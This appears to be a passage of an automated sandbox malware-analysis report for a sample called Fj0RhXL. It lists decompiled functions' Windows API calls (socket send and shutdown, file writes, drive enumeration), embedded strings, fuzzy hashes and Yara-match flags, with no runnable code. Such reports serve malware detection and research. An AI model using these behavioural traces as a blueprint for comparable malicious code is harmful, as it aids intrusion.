                                          • Instruction ID: 5699d331e2b2bf34886319062428d94d60b13e8b7da4c559ee723c3517036860
                                          • Opcode Fuzzy Hash: 6cb7d25eaa55de57b915cac20292b8b5b0f28d5c43023bce572565a300144876
                                          • Instruction Fuzzy Hash: 34413431E402048FD720DF68D988B2AF7F9FF88791F854959E68ACB281E371E4509B80
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D89DD4
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B19
                                            • Part of subcall function 03D99B04: __CxxThrowException@8.LIBCMT ref: 03D99B2E
                                            • Part of subcall function 03D99B04: std::exception::exception.LIBCMT ref: 03D99B3F
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D89DF8
                                          • _memmove.LIBCMT ref: 03D89E2D
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D89E57
                                          • _memmove.LIBCMT ref: 03D89ED4
                                          • _memmove.LIBCMT ref: 03D89EF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Xinvalid_argument_memmovestd::_$std::exception::exception$Exception@8Throw
                                          • String ID: invalid string position$string too long
                                          • API String ID: 1387324424-4289949731
                                          • Opcode ID: 2ccc91e40cca5f2a8bad3ab61217cda407bc229d8f0eb4dab6b79014587962b0
                                          • Instruction ID: 046707f5d47dfc472b0fb51e55b2c492f99a59b6bd025393d297777df5c47c28
                                          • Opcode Fuzzy Hash: 2ccc91e40cca5f2a8bad3ab61217cda407bc229d8f0eb4dab6b79014587962b0
                                          • Instruction Fuzzy Hash: 0C51E731B102049BD729EF6CD8A097EF7EAEF85614B28491EE4D28B741D771EC408794
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$ColorText
                                          • String ID: %s %s %s: %s's$%s.$This person$their %s.
                                          • API String ID: 777165778-500940785
                                          • Opcode ID: 7da19962ee0f59d15688f9e7959ed26dba64b55a614c7461e126d8bbfda97a46
                                          • Instruction ID: 346c878266617ee11002eb58e3b39d92d9bc9ac25486e497cd824a7ed647ce0b
                                          • Opcode Fuzzy Hash: 7da19962ee0f59d15688f9e7959ed26dba64b55a614c7461e126d8bbfda97a46
                                          • Instruction Fuzzy Hash: 194127B2E01014AFDB21EF28CC81FE8B7B6AB16308F044595D1C497650CBBDED948FA5
                                          APIs
                                          • _memset.LIBCMT ref: 03D96F7E
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 03D96F9C
                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03D96FD9
                                          • CloseHandle.KERNEL32(00000000), ref: 03D96FE4
                                          • lstrlenW.KERNEL32(?), ref: 03D96FF1
                                          • wsprintfW.USER32 ref: 03D97015
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                          • String ID: %s %s
                                          • API String ID: 1326869720-2939940506
                                          • Opcode ID: e5795a1038eaf81e8d298a2b4e38de5c29865a53dcb419d0da16a537e6fb2a7f
                                          • Instruction ID: 230a389aa9ffdddc520c5d04e490d513e7b6414a818a5e4ddb529ef57b5dd773
                                          • Opcode Fuzzy Hash: e5795a1038eaf81e8d298a2b4e38de5c29865a53dcb419d0da16a537e6fb2a7f
                                          • Instruction Fuzzy Hash: 72318673610218EBEF24DF64DC84FEB7378EB44711F44069AF649A61C0EA749A54CFA1
                                          APIs
                                          • lstrcmpiW.KERNEL32(?,A:\), ref: 03D89666
                                          • lstrcmpiW.KERNEL32(?,B:\), ref: 03D89676
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03D896A6
                                          • lstrlenW.KERNEL32(?), ref: 03D896B7
                                          • __wcsnicmp.LIBCMT ref: 03D896CE
                                          • lstrcpyW.KERNEL32(00000AD4,?), ref: 03D89704
                                          • lstrcpyW.KERNEL32(?,?), ref: 03D89728
                                          • lstrcatW.KERNEL32(?,00000000), ref: 03D89733
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                          • String ID: A:\$B:\
                                          • API String ID: 4249875308-1009255891
                                          • Opcode ID: 7ac5a0dadc758f8a48d1e48f0bc158329e0058d4a4acd6f12d19adaec2b2b820
                                          • Instruction ID: 75c1d2d5def91b267a09a21a2f1b92354ade4f139f40b92e5842c037800fb974
                                          • Opcode Fuzzy Hash: 7ac5a0dadc758f8a48d1e48f0bc158329e0058d4a4acd6f12d19adaec2b2b820
                                          • Instruction Fuzzy Hash: 4F114F72A01218DBDB20EFA1DC44BEEB378EF45700F044599DA1AA7240E770EA05CBA5
                                          APIs
                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,90594F2A,00000000,74DF2EE0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9,00000000), ref: 03D94433
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(03D98D59,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D944D2
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94510
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94535
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D9455A
                                            • Part of subcall function 03D81280: __CxxThrowException@8.LIBCMT ref: 03D81290
                                            • Part of subcall function 03D97AD0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98C21,00000000,90594F2A,03D98BF9,74DF2F60,00000000,?,03D98DD1,03DB0B1B,000000FF,?,03D9460A,03D98DD1,?,?,00000000), ref: 03D97B27
                                            • Part of subcall function 03D97AD0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98C39,00000000,?,03D98DD1,03DB0B1B,000000FF,?,03D9460A,03D98DD1,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D97B43
                                          • InterlockedExchange.KERNEL32(03D98C11,00000000), ref: 03D94660
                                          • timeGetTime.WINMM(?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94666
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94674
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D9467D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$CountCriticalInitializeSectionSpin$Exception@8ExchangeInterlockedThrowTimetime
                                          • String ID:
                                          • API String ID: 997586827-0
                                          • Opcode ID: 6d12443dc5d2d725db4770898321ce23d198180a752b5240d2b4a1a15b689ebc
                                          • Instruction ID: b0d9017d75555bf861823876c342041c512800e23a5edd959922d437707756db
                                          • Opcode Fuzzy Hash: 6d12443dc5d2d725db4770898321ce23d198180a752b5240d2b4a1a15b689ebc
                                          • Instruction Fuzzy Hash: A381D7B1A01A46FFE744DF7AC88479AFBA8FB09344F50422EE12D87640D775A964CF90
                                          APIs
                                            • Part of subcall function 03D83630: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03D83637
                                            • Part of subcall function 03D83630: _free.LIBCMT ref: 03D8366C
                                            • Part of subcall function 03D83630: _malloc.LIBCMT ref: 03D836A7
                                            • Part of subcall function 03D83630: _memset.LIBCMT ref: 03D836B5
                                          • InterlockedIncrement.KERNEL32(03DC433C), ref: 03D83535
                                          • InterlockedIncrement.KERNEL32(03DC433C), ref: 03D83543
                                          • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 03D8356A
                                          • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 03D83583
                                          • ResetEvent.KERNEL32(?,?,?,03DC433C), ref: 03D835BE
                                          • SetLastError.KERNEL32(00000000), ref: 03D835F1
                                          • GetLastError.KERNEL32 ref: 03D83609
                                            • Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
                                            • Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
                                            • Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
                                            • Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
                                            • Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
                                            • Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
                                            • Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6
                                          • SetLastError.KERNEL32(00000000), ref: 03D83619
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 127459856-0
                                          • Opcode ID: 43c7caa43468428c89a53189e96d11055d849b823662727e7b51b8721e085545
                                          • Instruction ID: 2c42a98061baaa4226f3d6020304af4496622e606ae5eb53c4cdc259e0884546
                                          • Opcode Fuzzy Hash: 43c7caa43468428c89a53189e96d11055d849b823662727e7b51b8721e085545
                                          • Instruction Fuzzy Hash: C34160BA640704AFD360EF69DC81B5AB7E8FB48B11F50082EE68AD7780D7B1F5448B50
                                          APIs
                                            • Part of subcall function 02F03650: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02F03657
                                            • Part of subcall function 02F03650: _free.LIBCMT ref: 02F0368C
                                            • Part of subcall function 02F03650: _malloc.LIBCMT ref: 02F036C7
                                            • Part of subcall function 02F03650: _memset.LIBCMT ref: 02F036D5
                                          • InterlockedIncrement.KERNEL32(02F1D990), ref: 02F03555
                                          • InterlockedIncrement.KERNEL32(02F1D990), ref: 02F03563
                                          • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02F0358A
                                          • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02F035A3
                                          • ResetEvent.KERNEL32(?,?,?,02F1D990), ref: 02F035DE
                                          • SetLastError.KERNEL32(00000000), ref: 02F03611
                                          • GetLastError.KERNEL32 ref: 02F03629
                                            • Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
                                            • Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
                                            • Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
                                            • Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
                                            • Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
                                            • Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
                                            • Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015
                                          • SetLastError.KERNEL32(00000000), ref: 02F03639
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 127459856-0
                                          • Opcode ID: 30b3709b19c5e156ad92909337dab1352c3a0bbd307cedfce7cf6622ca7903f1
                                          • Instruction ID: 730e3dcf6e29e346ee7df419059701740c3e4f54ab11de32002954684348e516
                                          • Opcode Fuzzy Hash: 30b3709b19c5e156ad92909337dab1352c3a0bbd307cedfce7cf6622ca7903f1
                                          • Instruction Fuzzy Hash: EF417CB1A40704AFE360EF69DCC0B6AF7E5BB48751F91086EE64AD7680D7B1E8048F50
                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 03D84473
                                          • ResetEvent.KERNEL32(?), ref: 03D8447C
                                          • timeGetTime.WINMM ref: 03D8447E
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 03D8448D
                                          • WaitForSingleObject.KERNEL32(?,00001770), ref: 03D844DB
                                          • ResetEvent.KERNEL32(?), ref: 03D844F8
                                            • Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
                                            • Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
                                            • Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
                                            • Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
                                            • Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
                                            • Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
                                            • Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6
                                          • ResetEvent.KERNEL32(?), ref: 03D8450C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                          • String ID:
                                          • API String ID: 542259498-0
                                          • Opcode ID: 65ea6550bb1547bd5909b4e3a840df6eecb4d4ecd103d5e39c827bbf709dd9bd
                                          • Instruction ID: f23ce76511145f0edb0085d8537a54d16c08c4527d71d38d93777445052809c8
                                          • Opcode Fuzzy Hash: 65ea6550bb1547bd5909b4e3a840df6eecb4d4ecd103d5e39c827bbf709dd9bd
                                          • Instruction Fuzzy Hash: 85216176600704ABC720FF79DC84B9BB3E8EF88B10F100A5EE59AC7640D671F5448BA1
                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 02F04433
                                          • ResetEvent.KERNEL32(?), ref: 02F0443C
                                          • timeGetTime.WINMM ref: 02F0443E
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02F0444D
                                          • WaitForSingleObject.KERNEL32(?,00001770), ref: 02F0449B
                                          • ResetEvent.KERNEL32(?), ref: 02F044B8
                                            • Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
                                            • Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
                                            • Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
                                            • Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
                                            • Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
                                            • Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
                                            • Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015
                                          • ResetEvent.KERNEL32(?), ref: 02F044CC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                          • String ID:
                                          • API String ID: 542259498-0
                                          • Opcode ID: 781b24087a41024779eaa12566ecd48412ff1c8d46ae509e961ec3488090f1b1
                                          • Instruction ID: ed72a67de6799f290621b6b53e5303d73d24c82e91ba203cc9ff2db12bb9291e
                                          • Opcode Fuzzy Hash: 781b24087a41024779eaa12566ecd48412ff1c8d46ae509e961ec3488090f1b1
                                          • Instruction Fuzzy Hash: 052193766407046BD630EF79DD84B9BF3E8EF89751F500A0EF68AC7280D671B4009BA0
                                          APIs
                                          • SetLastError.KERNEL32(0000139F,?), ref: 03D84E79
                                          • TryEnterCriticalSection.KERNEL32(?,?), ref: 03D84E98
                                          • TryEnterCriticalSection.KERNEL32(?), ref: 03D84EA2
                                          • SetLastError.KERNEL32(0000139F), ref: 03D84EB9
                                          • LeaveCriticalSection.KERNEL32(?), ref: 03D84EC2
                                          • LeaveCriticalSection.KERNEL32(?), ref: 03D84EC9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 4082018349-0
                                          • Opcode ID: 6cfe7f9333a8fb9ab74f18b0398b3826dcebc677cf064c439e98832aaa7f1576
                                          • Instruction ID: 3b47cdfbe4da5f15dd61aac3101257b61e1c602b0591fbabf110ebc5b544ed4a
                                          • Opcode Fuzzy Hash: 6cfe7f9333a8fb9ab74f18b0398b3826dcebc677cf064c439e98832aaa7f1576
                                          • Instruction Fuzzy Hash: 74116333600305CBC320FB7AEC8596BF3E8EF48711B040A6EE655C2650EA71E844C6A5
                                          APIs
                                          • SetLastError.KERNEL32(0000139F,?), ref: 02F04E69
                                          • TryEnterCriticalSection.KERNEL32(?,?), ref: 02F04E88
                                          • TryEnterCriticalSection.KERNEL32(?), ref: 02F04E92
                                          • SetLastError.KERNEL32(0000139F), ref: 02F04EA9
                                          • LeaveCriticalSection.KERNEL32(?), ref: 02F04EB2
                                          • LeaveCriticalSection.KERNEL32(?), ref: 02F04EB9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 4082018349-0
                                          • Opcode ID: 3918de8c664c24e23117635842f05635b0a44f86dbee421fb0713396bf0b2882
                                          • Instruction ID: 785b6b9643c1a1a01db76f7aa94368de9231161121795588b317f182c5db2bc3
                                          • Opcode Fuzzy Hash: 3918de8c664c24e23117635842f05635b0a44f86dbee421fb0713396bf0b2882
                                          • Instruction Fuzzy Hash: 85116332B003058BD320EBB9ED84A6BF7E8EB88755B810A2AE705C6580D771D815DAA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$_fprintf
                                          • String ID: %.3s$%d %d(%c)center$Aln$M31
                                          • API String ID: 3156639200-3137262557
                                          • Opcode ID: ab2f0d2ff2820982ece6c8e2c7787755c2c86818e7491c2f2ae2f91a5e48a02c
                                          • Instruction ID: c0b0048b0c6ffecbdfa055ba71cf765086de516176996dce6d235e107e49d1f1
                                          • Opcode Fuzzy Hash: ab2f0d2ff2820982ece6c8e2c7787755c2c86818e7491c2f2ae2f91a5e48a02c
                                          • Instruction Fuzzy Hash: 4BA1EF7A744224ABDB10EF68C881B9D3BB6E74B72CF244507E504C6A90D772DC868F93
                                          APIs
                                            • Part of subcall function 03D81620: __vswprintf.LIBCMT ref: 03D81656
                                          • _malloc.LIBCMT ref: 03D82380
                                            • Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
                                            • Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
                                            • Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83
                                          • _memmove.LIBCMT ref: 03D823C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap__vswprintf_malloc_memmove
                                          • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                          • API String ID: 1438150933-868042568
                                          • Opcode ID: aeb09069d2fa85b61033532c46c5b7aaf0df31ee13c1c03909695b0155789dac
                                          • Instruction ID: 5a4bb944ef625676ce8e9d68e2866f73636d6e71dbde7f3a86d3d2b242f13b23
                                          • Opcode Fuzzy Hash: aeb09069d2fa85b61033532c46c5b7aaf0df31ee13c1c03909695b0155789dac
                                          • Instruction Fuzzy Hash: C2B1A475A002098FCB18EF6DD8906AEBBB5FF44710F0849AEDD499B346D731E945CBA0
                                          APIs
                                          • MoveToEx.GDI32(00000003,?,00000000,?), ref: 6C3CDD56
                                          • LineTo.GDI32(00000000,?), ref: 6C3CDD68
                                          • SetPixel.GDI32(00000000,?,?,6C3CF814), ref: 6C3CDD86
                                          • _fprintf.LIBCMT ref: 6C3CDDE6
                                          • _fprintf.LIBCMT ref: 6C3CDE05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf$LineMovePixel
                                          • String ID: %d %d %d %d l$%d %d t
                                          • API String ID: 4254231064-3651011223
                                          • Opcode ID: 1520da9912e777c97106956461753988d58b9190b9a69d26313dc561e9a69ffd
                                          • Instruction ID: 5fe1cef1913a88730d22b657fc46489a0c2303ccc7b09ffe2f0410e8852cfee8
                                          • Opcode Fuzzy Hash: 1520da9912e777c97106956461753988d58b9190b9a69d26313dc561e9a69ffd
                                          • Instruction Fuzzy Hash: A4A18B71F8021ADBDF00EF69C88559E7BB5FB46328F24822AF914E6A40D7319D518FD2
                                          APIs
                                          • SetLastError.KERNEL32(0000007F), ref: 03D988B2
                                          • SetLastError.KERNEL32(0000007F), ref: 03D989B5
                                          Strings
                                          Memory Dump Source
